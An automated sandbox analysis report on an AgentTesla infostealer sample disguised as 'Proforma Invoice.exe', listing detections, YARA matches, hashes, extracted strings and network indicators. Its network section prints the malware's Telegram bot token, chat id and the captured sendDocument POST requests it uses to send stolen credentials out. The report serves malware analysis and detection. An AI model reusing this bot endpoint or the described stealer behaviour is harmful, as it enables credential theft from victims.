Windows Analysis Report
Proforma Invoice.exe

Overview

General Information

Sample Name:	Proforma Invoice.exe
Analysis ID:	668067
MD5:	bea52e8910c076f5720ac20970e48a10
SHA1:	42777245a3f79ea5b2bcf1ea48811111b1cc3529
SHA256:	8d5f8190ec870db510d2b95b830a07bf3c67d9996df775778dfa82b6c2bdd7b3
Tags:	exe
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Telegram RAT

Yara detected AgentTesla

Yara detected AntiVM3

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Tries to steal Mail credentials (via file / registry access)

Initial sample is a PE file and has a suspicious name

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses the Telegram API (likely for C&C communication)

Machine Learning detection for sample

.NET source code contains potential unpacker

Yara detected Generic Downloader

.NET source code contains very large array initializations

Machine Learning detection for dropped file

Adds a directory exclusion to Windows Defender

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Uses schtasks.exe or at.exe to add and modify task schedules

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

Drops PE files

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: Proforma Invoice.exe	Virustotal: Detection: 31%	Perma Link
Source: Proforma Invoice.exe	Metadefender: Detection: 37%	Perma Link
Source: Proforma Invoice.exe	ReversingLabs: Detection: 55%

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe	Metadefender: Detection: 37%			Perma Link
Source: C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe	ReversingLabs: Detection: 55%

Machine Learning detection for sample

Source: Proforma Invoice.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 8.2.Proforma Invoice.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen8
Source: 8.0.Proforma Invoice.exe.400000.8.unpack	Avira: Label: TR/Spy.Gen8
Source: 8.0.Proforma Invoice.exe.400000.6.unpack	Avira: Label: TR/Spy.Gen8
Source: 8.0.Proforma Invoice.exe.400000.12.unpack	Avira: Label: TR/Spy.Gen8
Source: 8.0.Proforma Invoice.exe.400000.10.unpack	Avira: Label: TR/Spy.Gen8
Source: 8.0.Proforma Invoice.exe.400000.4.unpack	Avira: Label: TR/Spy.Gen8

Source: 0.2.Proforma Invoice.exe.459ae68.9.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "5359531870", "Chat URL": "https://api.telegram.org/bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendDocument"}
Source: Proforma Invoice.exe.7152.0.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendMessage"}

Uses 32bit PE files

Source: Proforma Invoice.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49781 version: TLS 1.2

Source: Proforma Invoice.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.6:49781 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 8.0.Proforma Invoice.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.Proforma Invoice.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.Proforma Invoice.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.Proforma Invoice.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.45cf688.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.459ae68.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.Proforma Invoice.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.4564848.10.raw.unpack, type: UNPACKEDPE

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da68ac1cc55b48Host: api.telegram.orgContent-Length: 1022Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da68ad9679701fHost: api.telegram.orgContent-Length: 1900Expect: 100-continue

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 149.154.167.220 149.154.167.220

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443

Source: Proforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: Proforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: Proforma Invoice.exe, 00000008.00000002.642687799.0000000003255000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000003.453167723.0000000001254000.00000004.00000020.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.643016652.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.643092928.00000000032CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a7Yu7sNuvhjH4U.com
Source: Proforma Invoice.exe, 00000008.00000002.642687799.0000000003255000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a7Yu7sNuvhjH4U.comx
Source: Proforma Invoice.exe	String found in binary or memory: http://api.eve-central.com/api/marketstat
Source: Proforma Invoice.exe, ebJpPhiwjcAviB.exe.0.dr	String found in binary or memory: http://api.eve-central.com/api/marketstatIDon
Source: Proforma Invoice.exe, ebJpPhiwjcAviB.exe.0.dr	String found in binary or memory: http://api.eve-online.com/
Source: Proforma Invoice.exe, 00000008.00000002.643272697.0000000003302000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.643092928.00000000032CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: ebJpPhiwjcAviB.exe.0.dr	String found in binary or memory: http://code.google.com/p/com232term
Source: Proforma Invoice.exe, 00000008.00000002.647450061.00000000068D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Proforma Invoice.exe, 00000008.00000002.647093535.0000000006865000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: Proforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://eIoKIh.com
Source: Proforma Invoice.exe, ebJpPhiwjcAviB.exe.0.dr	String found in binary or memory: http://eve.no-ip.de/prices/30d/
Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: ebJpPhiwjcAviB.exe.0.dr	String found in binary or memory: http://github.com/riuson/com232term
Source: Proforma Invoice.exe, 00000000.00000002.417720343.0000000002C24000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.643035960.00000000032B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: Proforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org%
Source: Proforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org%%startupfolder%
Source: Proforma Invoice.exe, 00000008.00000002.643035960.00000000032B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Proforma Invoice.exe, 00000000.00000002.421261359.0000000004564000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000000.410969105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000000.410130498.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/
Source: Proforma Invoice.exe, 00000008.00000002.643035960.00000000032B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendDocument
Source: Proforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendDocumentdocument-----
Source: Proforma Invoice.exe, 00000008.00000002.643035960.00000000032B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org4
Source: Proforma Invoice.exe, 00000008.00000002.643272697.0000000003302000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.orgD8
Source: Proforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www

Source: unknown

HTTP traffic detected: POST /bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da68ac1cc55b48Host: api.telegram.orgContent-Length: 1022Expect: 100-continueConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: api.telegram.org

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49781 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 8.0.Proforma Invoice.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 8.0.Proforma Invoice.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Proforma Invoice.exe.459ae68.9.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 8.2.Proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 8.0.Proforma Invoice.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 8.0.Proforma Invoice.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Proforma Invoice.exe.45cf688.11.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Proforma Invoice.exe.45cf688.11.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Proforma Invoice.exe.459ae68.9.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 8.0.Proforma Invoice.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Proforma Invoice.exe.4564848.10.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Proforma Invoice.exe

.NET source code contains very large array initializations

Source: 8.2.Proforma Invoice.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bFC196D4Eu002d8A43u002d4DC5u002dA5AEu002d085A2CD06847u007d/E9DED5F1u002dFF4Eu002d4645u002d84C8u002d74E99AE54950.cs	Large array initialization: .cctor: array initializer size 11689
Source: 8.0.Proforma Invoice.exe.400000.8.unpack, u003cPrivateImplementationDetailsu003eu007bFC196D4Eu002d8A43u002d4DC5u002dA5AEu002d085A2CD06847u007d/E9DED5F1u002dFF4Eu002d4645u002d84C8u002d74E99AE54950.cs	Large array initialization: .cctor: array initializer size 11689
Source: 8.0.Proforma Invoice.exe.400000.6.unpack, u003cPrivateImplementationDetailsu003eu007bFC196D4Eu002d8A43u002d4DC5u002dA5AEu002d085A2CD06847u007d/E9DED5F1u002dFF4Eu002d4645u002d84C8u002d74E99AE54950.cs	Large array initialization: .cctor: array initializer size 11689

Uses 32bit PE files

Source: Proforma Invoice.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Yara signature match

Source: 8.0.Proforma Invoice.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 8.0.Proforma Invoice.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.Proforma Invoice.exe.459ae68.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 8.2.Proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 8.0.Proforma Invoice.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 8.0.Proforma Invoice.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.Proforma Invoice.exe.45cf688.11.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.Proforma Invoice.exe.45cf688.11.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.Proforma Invoice.exe.459ae68.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 8.0.Proforma Invoice.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.Proforma Invoice.exe.4564848.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload

Detected potential crypto function

Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_00F5DE44	0_2_00F5DE44
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_053F2550	0_2_053F2550
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_053F2540	0_2_053F2540
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_053F55F8	0_2_053F55F8
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_053F55E8	0_2_053F55E8
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_053F8404	0_2_053F8404
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_053F6710	0_2_053F6710
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_053F6700	0_2_053F6700
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_053F6170	0_2_053F6170
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_053F1160	0_2_053F1160
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_053F6160	0_2_053F6160
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_053F1151	0_2_053F1151
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_053F9230	0_2_053F9230
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_053F7296	0_2_053F7296
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_053F7280	0_2_053F7280
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_053F72D8	0_2_053F72D8
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_053F4D18	0_2_053F4D18
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_053F4D08	0_2_053F4D08
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_053F3DA8	0_2_053F3DA8
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_053F3D9A	0_2_053F3D9A
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_053F5C18	0_2_053F5C18
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_053F5C0A	0_2_053F5C0A
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_053F1C07	0_2_053F1C07
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_053F6C78	0_2_053F6C78
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_053F6C68	0_2_053F6C68
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_053F1CB0	0_2_053F1CB0
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_053F2F00	0_2_053F2F00
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_053F5FD0	0_2_053F5FD0
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_053F5FC0	0_2_053F5FC0
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_053F2EF0	0_2_053F2EF0
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_0678B738	8_2_0678B738
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_06785868	8_2_06785868
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_06788CF4	8_2_06788CF4
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_0678E1D8	8_2_0678E1D8
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_06787840	8_2_06787840
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_067D76E8	8_2_067D76E8
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_067DD808	8_2_067DD808
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_067D28C0	8_2_067D28C0
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_067D2D0A	8_2_067D2D0A
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_067D7E98	8_2_067D7E98
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_067D7F38	8_2_067D7F38
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_067DACE0	8_2_067DACE0
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_067DAC80	8_2_067DAC80
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_067D1108	8_2_067D1108
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_0696E718	8_2_0696E718
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_06965CE8	8_2_06965CE8
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_06962A54	8_2_06962A54

Sample file is different than original file name gathered from version info

Source: Proforma Invoice.exe, 00000000.00000002.417720343.0000000002C24000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamebNBFdhruQlCkFVzVzjIW.exe4 vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXmlEn.exe6 vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: l,\\StringFileInfo\\000004B0\\OriginalFilename vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000000.00000002.418665405.0000000004169000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameThookinieng.dllJ vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000000.00000002.416363031.0000000002961000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000000.00000002.416363031.0000000002961000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTokenImpersonation.dll" vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000000.00000002.425054578.0000000007440000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTokenImpersonation.dll" vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000000.00000002.421261359.0000000004564000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamebNBFdhruQlCkFVzVzjIW.exe4 vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000000.00000003.395674663.0000000008768000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXmlEn.exe6 vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000000.00000000.369717521.000000000059E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameXmlEn.exe6 vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000000.00000002.426347057.000000000ADA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameThookinieng.dllJ vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000008.00000002.637983278.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameXmlEn.exe6 vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000008.00000000.410969105.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamebNBFdhruQlCkFVzVzjIW.exe4 vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000008.00000002.638082083.00000000010F8000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Proforma Invoice.exe
Source: Proforma Invoice.exe	Binary or memory string: OriginalFilenameXmlEn.exe6 vs Proforma Invoice.exe

Source: Proforma Invoice.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ebJpPhiwjcAviB.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Proforma Invoice.exe	Virustotal: Detection: 31%
Source: Proforma Invoice.exe	Metadefender: Detection: 37%
Source: Proforma Invoice.exe	ReversingLabs: Detection: 55%

Source: C:\Users\user\Desktop\Proforma Invoice.exe

File read: C:\Users\user\Desktop\Proforma Invoice.exe

